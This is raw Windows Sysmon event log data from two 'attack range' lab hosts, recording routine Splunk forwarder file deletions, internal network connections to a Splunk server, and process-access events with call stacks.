23542300x8000000000000000222184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:34.247{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD0E417E3C019D5CD95C9AADF475ECF7,SHA256=D51CC635E62426CEFF7A0E1D7D8E9FC9D76E4DD77F1CE944DEFB08D3C4B3867B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:34.021{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A45934BB258C6654D6AF4FDCFA1D96D9,SHA256=AE05479C5A3189AE338A2E7A74ABCEE514EE851CBE887713B54E23B15B6E22FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:35.262{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BC6EF0DD59F7D4F3B9BB839A21C8874,SHA256=3E0D8095AE829C6218C2CC4CAB1DEE8D26AF0764A8F529199992E1D04C0A3520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:35.071{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1093607B5DBBB558ED6533DAD3E12DF,SHA256=AAF078820E7871255103F25DF86D5697C88779306E9536536C19EDF46DFA57F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:36.262{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5583F6AD3406930889F326416E1D21E,SHA256=1D1BB63ACC67560258F60CE423ABA533D23E8AD3601296F6F311EB15005AF5C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:34.567{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49525-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:36.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE03760B4363039D443A740A3CF78EFD,SHA256=78CB2F4EF6785CD28E79040CDEB3FD2970168275773211876C33D1AA921B9933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:37.278{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89394539869E19511434081B6E32B560,SHA256=12C85781DF4A453D03D16ECEFA29D5B6C23A4C7FC2199257403AB6F231D44F45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:37.655{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:37.655{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=745FAC9B06AB7B226A7E0A5874953117,SHA256=509F19D5DD9D10FC5BE335FE9FE4CAE86E8BC56D2567BEEF94B73B3368A982F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:37.121{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DC4A0FBB2E04413EC04D9D7475546DE,SHA256=E2750E72BE6626B05E61F65B92AE7E06FBD7B45A7419FA316577EDD6443E64FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:38.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B6D49CB9511C4071B7A65CE3AB1A52,SHA256=51C9D9EAB9828C3D83CF9E08F6D4EFF98A7DAC569CD79CFE96D662F3AE5A22F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:38.140{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEF16DF1A19592E19DFA0B8C603674AA,SHA256=E0705732ADCF11F9836804BBC7CA00578B4E8AB9B9601C2C31EB4FABC9EEED44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:39.309{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEE72A3783037B2C121AE401A5209DD0,SHA256=A6861C4A4D782B64053D8347746A34EFDA7E164C7D5B267BD33547508638DAB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:39.149{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=740A3D8CF6C9E6A613514E8FD9E296D1,SHA256=CCB0CB029A14B70677A17010E5BD3E95F5100D0856408A17D7E1C9D3AED4DEE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:40.543{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ACFDD75B5ADEE8578BBB759ABF95BDA,SHA256=EC434EA5D8423E1D81FD7D9D269BD14627470D6E325CD128BC8F7F0AD6498F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:40.580{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:40.180{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C982E6B81251CDC4CC1974458929CF6,SHA256=EF80274BF2E973CF73DFD39A9D46A39F812217A3AC9CC8C1CE76540CC2983591,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:37.560{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51703-false10.0.1.12-8000- 23542300x8000000000000000222192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:41.778{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3BE78A7AA483FDA5A49B9E942B92A2F,SHA256=F81B80BFEDEA622A2FAA3BDB9162BE50B1D273337E5699E2B992095AFA6439C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:41.211{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=787F34155390A7E6F35729917F6A8788,SHA256=8F6040AB3ACE972F46E81555C8DCD21B07AFFAEC06FDD765A16B16A2DE95CF83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:42.887{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A7BD5C5A8C614FB7337976FF63A8EC5,SHA256=309FB88187DAFBA1227C7B26DC3D984F0712523E61083EFB8EBA8C42E1108743,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:40.576{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49527-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000298392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:40.029{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49526-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000298391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:42.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04BCBB0DD50C91D383CD5D18B654310E,SHA256=06CB5588157A9DE89189E26264F5CF5374572F1D9F9232772D6287EBCF6A05BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:43.312{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3913AF0B6029E2E8200DD55C234670E,SHA256=BAC534B97351A1093FFB05B8CBAD3D80302985AB6C9F4C5C46F8A5847B76FAA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:44.312{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=008380ED6C67DE25C604A16957DF7B4D,SHA256=706BAE4B52816633818212BC880BAF28F082F3F7F2FF573D447016F7974C22D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18C8-6216-3305-000000003902}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222214Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222213Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222212Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-18C8-6216-3305-000000003902}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222211Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.680{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18C8-6216-3305-000000003902}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 